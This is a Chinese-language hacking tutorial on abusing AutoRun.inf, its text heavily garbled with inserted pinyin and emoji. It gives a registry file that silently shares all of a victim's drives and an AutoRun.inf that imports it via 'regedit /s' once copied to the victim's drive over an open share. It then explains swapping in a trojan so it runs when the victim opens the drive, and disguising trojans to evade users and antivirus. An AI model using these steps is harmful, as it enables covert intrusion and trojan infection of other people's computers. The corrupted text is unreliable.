最近网上流行通过【tōng guò】🏬AutoRun.inf文件使【wén jiàn shǐ】对方所有的硬盘完全共享或【gòng xiǎng huò】中木马【zhōng mù mǎ】的方法😀，由于🎪AutoRun.inf文件在黑客技【hēi kè jì】术中的🤣应用还🐯是很少🐷见的📹，相应的【xiàng yīng de】🎛资料也不多【bú duō】，有很多人对此🈺觉得很【jiào dé hěn】神秘，本文试😕图为您【tú wéi nín】解开这个迷🌅，使您能【shǐ nín néng】完全的了解这个并不复杂却极其有趣的技【qù de jì】术。

　　一、理论基础

　　经常使用光盘【yòng guāng pán】🔣的朋友都知道，有很多光盘放入光驱【qū】🕘就会自【jiù huì zì】🔽动运行，它【tā】们是怎么做👄的呢？光盘一😰放入光驱【qū】🕘就会自【jiù huì zì】🔽动被执行，主要依靠两个🕔文件【wén jiàn】👨，一是光🌑盘上的AutoRun.inf文件【wén jiàn】👨，另一个【lìng yī gè】是操作系统本身的系统文件【tǒng wén jiàn】👨之一的Cdvsd.vxd。Cdvsd.vxd会随时【huì suí shí】侦测光【zhēn cè guāng】驱【qū】中是⌚否有放📚入光盘【rù guāng pán】的动作【de dòng zuò】🛁，如果有【rú guǒ yǒu】的话，便开始🙇寻找光【xún zhǎo guāng】👸盘根目录下的【lù xià de】AutoRun.inf文件【wén jiàn】👨。如果存【rú guǒ cún】在AutoRun.inf文件【wén jiàn】👨则执行它【tā】💿里面的🔘预设程【yù shè chéng】序。

　　AutoRun.inf不光能【bú guāng néng】让光盘【pán】🈷自动运【zì dòng yùn】🌃行程序💰，也能让硬盘【pán】🈷自动运【zì dòng yùn】🌃行程序💰，方法很简单，先打开【xiān dǎ kāi】📒记事本【jì shì běn】，然后用鼠标右🚓键点击该文件【gāi wén jiàn】🆘，在【zài】弹出💮菜单中选择🚔“重命名”，将其改🥧名为AutoRun.inf，在【zài】AutoRun.inf中键入以下内容【róng】💼：[AutoRun]//表示【biǎo shì】👻AutoRun部分开【bù fèn kāi】始【shǐ】，必须输入Icon=C:C.ico//给C盘【pán】🈷一个个性化的盘【pán】符👙图标C.icoOpen=C:1.exe//指定要运行程序💰的路径和名称，在【zài】此假设为【shè wéi】👥C盘【pán】🈷下的1.exe保存该🚉文件🆘，按F5刷新桌🍌面，再看“我的电脑【nǎo】”中的该【zhōng de gāi】盘【pán】符🎶（在此为【zài cǐ wéi】C盘【pán】🈷），你会发现它的磁盘图【cí pán tú】🍺标变了【biāo biàn le】，双击进🔀入C盘【pán】🈷，还会自【hái huì zì】✔动播放🕳C盘【pán】🈷下的1.exe文件🆘！

　　解释一【jiě shì yī】下【xià】：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件【jiàn】👄，“C:C.ico”为【wéi】图标🆒文件【jiàn】路径和文【jìng hé wén】件【jiàn】名，你在输🗽入时可😪以将它改为【wéi】你的图片【de tú piàn】文件【jiàn】所🔌在路径【zài lù jìng】😳和文件【jiàn】名。另外【lìng wài】，“.ico”为【wéi】图标🆒文件的【wén jiàn de】👦扩展名，如果你🈶手头上【shǒu tóu shàng】🍗没有这✴类文件【lèi wén jiàn】，可以用😮看图软🖲件【jiàn】ACDSee将其他格式的【gé shì de】软件转【ruǎn jiàn zhuǎn】换为【wéi】ico格式，或者找【huò zhě zhǎo】👚到一个后缀名为【wéi】BMP的文件【de wén jiàn】，将它直💵接改名为【wéi】ICO文件【jiàn】即可🎵。

　　“Open”行指定【háng zhǐ dìng】要自动⛪运行的文件及其盘符和路径🙂。要特别说明的【shuō míng de】💋是，如果你【rú guǒ nǐ】要改变【yào gǎi biàn】🐏的硬盘跟目录【gēn mù lù】🕛下没有😧自动播【zì dòng bō】放文件【fàng wén jiàn】👮，就应该把【bǎ】🈳“OPEN”行删掉，否则就【fǒu zé jiù】会因为【huì yīn wéi】找不到自动播【zì dòng bō】放文件【fàng wén jiàn】👮而打不开硬盘🆗，此时只能用鼠标右键🕋单击盘符在弹出菜单🤕中选“打开”才行【cái háng】。

　　二、实例

　　下面就【xià miàn jiù】🏝举个例子：如果你扫到一【sǎo dào yī】台开着139共享的【gòng xiǎng de】🌋机器，而对方只完全共享了D盘，我们要【wǒ men yào】让对方的所有【de suǒ yǒu】👧驱动器😽都共享➖。首先编👜辑一个【jí yī gè】注册表文件，打开记【dǎ kāi jì】🧝事本，键入以【jiàn rù yǐ】下内容🥡：

　　REGEDIT4

　　'此处一定要空一行

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="C:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanD$]

　　"ath"="D:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="E:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　以上我🏵只设置【zhī shè zhì】到🌅E盘【pán】，如果对方有很📟多逻辑盘【pán】符的请自行🆘设置。将以上部分另【bù fèn lìng】存为【cún wéi】Share.reg文件备【wén jiàn bèi】用。要特别注意REGEDIT4为大写且顶格【qiě dǐng gé】🍋书写🏸，其后要【qí hòu yào】空上一行，在最后一行记🔓得要按【dé yào àn】😩一次回【yī cì huí】车键🏫。

　　然后打【rán hòu dǎ】开记事本，编制一【biān zhì yī】🅾个AutoRun.inf文件🥀，键入以【jiàn rù yǐ】👑下内容：

　　[AutoRun]

　　Open=regedit/sShare.reg//加/s参数是🤜为了导【wéi le dǎo】入时不会显示🧓任何信【rèn hé xìn】息保存AutoRun.inf文件💲。将🚮Share.reg和🕛AutoRun.inf这两个文件都🍙复制到对方的【duì fāng de】D盘的根【pán de gēn】🌉目录下，这样对【zhè yàng duì】方只要双击D盘就会将🚮Share.reg导入注【dǎo rù zhù】册表【cè biǎo】🧒，这样对【zhè yàng duì】方电脑重启后所有驱【suǒ yǒu qū】🥓动器就【dòng qì jiù】🍶会都完全共享出来【chū lái】。

　　如果想让对方中木马，只要在🌰AutoRun.inf文件中💁，把【bǎ】“Open=Share.Reg”改成【gǎi chéng】“Open=木马服务【mǎ fú wù】🚺端文件名”，然后把【rán hòu bǎ】AutoRun.inf和配置👋好的木马服务【mǎ fú wù】🚺端一起复制到【fù zhì dào】对方D盘的根目录下🚬，这样不【zhè yàng bú】需对方【xū duì fāng】运行木【yùn háng mù】马服务【mǎ fú wù】🚺端程序，而只需他双击【tā shuāng jī】D盘就会使木马【shǐ mù mǎ】运行！这样做的好处⏮显而易见【jiàn】，那就是📳大大的增加了木马运行的主📍动性！须知许多人现【duō rén xiàn】🤸在都是【zài dōu shì】非常警惕的🙍，不熟悉🍖的文件🌂他们轻【tā men qīng】🛒易的不【yì de bú】☔会运行，而这种【ér zhè zhǒng】方法就很难防✂范了【fàn le】。

　　要说明的是🥚，给你下【gěi nǐ xià】木马🏥的人不会🧖那么蠢的不给木马【gěi mù mǎ】加以伪装🌊，一般说来，他们会【tā men huì】给木马【gěi mù mǎ】服务端文件【wén jiàn】改🐎个名字，或好听或和系【huò hé xì】统【tǒng】🤶文件【wén jiàn】🆖名很相【míng hěn xiàng】像，然后给【rán hòu gěi】🔍木马换个图标【gè tú biāo】，使它看【shǐ tā kàn】📢起来像TXT文件【wén jiàn】🆖、ZIP文件【wén jiàn】🆖或图片文件【wén jiàn】🆖等，，最后修改木马的🤛资源文件【wén jiàn】🆖使其不【shǐ qí bú】被杀毒软件识别【bié】🐾（具体的方法可以看网【yǐ kàn wǎng】上的文👧章【zhāng】），当服务【dāng fú wù】端用户信以为真时，木马却【mù mǎ què】🔤悄悄侵【qiāo qiāo qīn】🐆入了【le】系🎠统【tǒng】🤶。其实【qí shí】🗡，换个角度理解就不难🚹了【le】——要是您给别人【gěi bié rén】下木马🏥我想你也会这🔭样做的😒。以上手段再辅以如上🌷内容的🍲AutoRun.inf文件【wén jiàn】🆖就天衣无缝了【le】！

　　请大家【qǐng dà jiā】注意👣：保存的【bǎo cún de】🙆文件名必须是🐞“AutoRun.inf”，编制好【biān zhì hǎo】的🙆Autorun.inf文件和图标文♿件一定【jiàn yī dìng】要放在【yào fàng zài】🌉硬盘根😡目录下【mù lù xià】🤵。更进一步，如果你【rú guǒ nǐ】的🙆某个硬盘内容暂时🍯比较固定的🙆话，不妨用Flash做一个自动播🏞放文件【fàng wén jiàn】，再编上【zài biān shàng】“Autorun”文件，那你就【nà nǐ jiù】有最酷🤜、最个性的🙆硬盘了【yìng pán le】。

　　到这儿还没有【hái méi yǒu】完。大家知🏹道，在一些光盘放入后【rù hòu】，我们在⏮其图标上单击【shàng dān jī】鼠标右【shǔ biāo yòu】键，还会产生一个【shēng yī gè】🔂具有特【jù yǒu tè】✡色的目📅录菜单，如果能🤷对着我们的硬【men de yìng】盘点击鼠标右【shǔ biāo yòu】键也产【jiàn yě chǎn】生这样🚥的效果【de xiào guǒ】，那将更【nà jiāng gèng】🛠加的有特色🌰。其实，光盘能【guāng pán néng】有这样⏮的效果【de xiào guǒ】也仅仅是因为🏚在AutoRun.inf文件中有如下🐖两条语句【jù】：

　　shell标志＝显示的【xiǎn shì de】鼠标右📓键菜单中内容【zhōng nèi róng】🤜

　　shell标志command＝要执行【háng】⚽的文件♑或命令【huò mìng lìng】行【háng】

　　所以，要让硬盘具有特色的【tè sè de】目录菜单🛁，在😑AutoRun.inf文件中加入上【jiā rù shàng】述语句【shù yǔ jù】🧚即可【jí kě】😘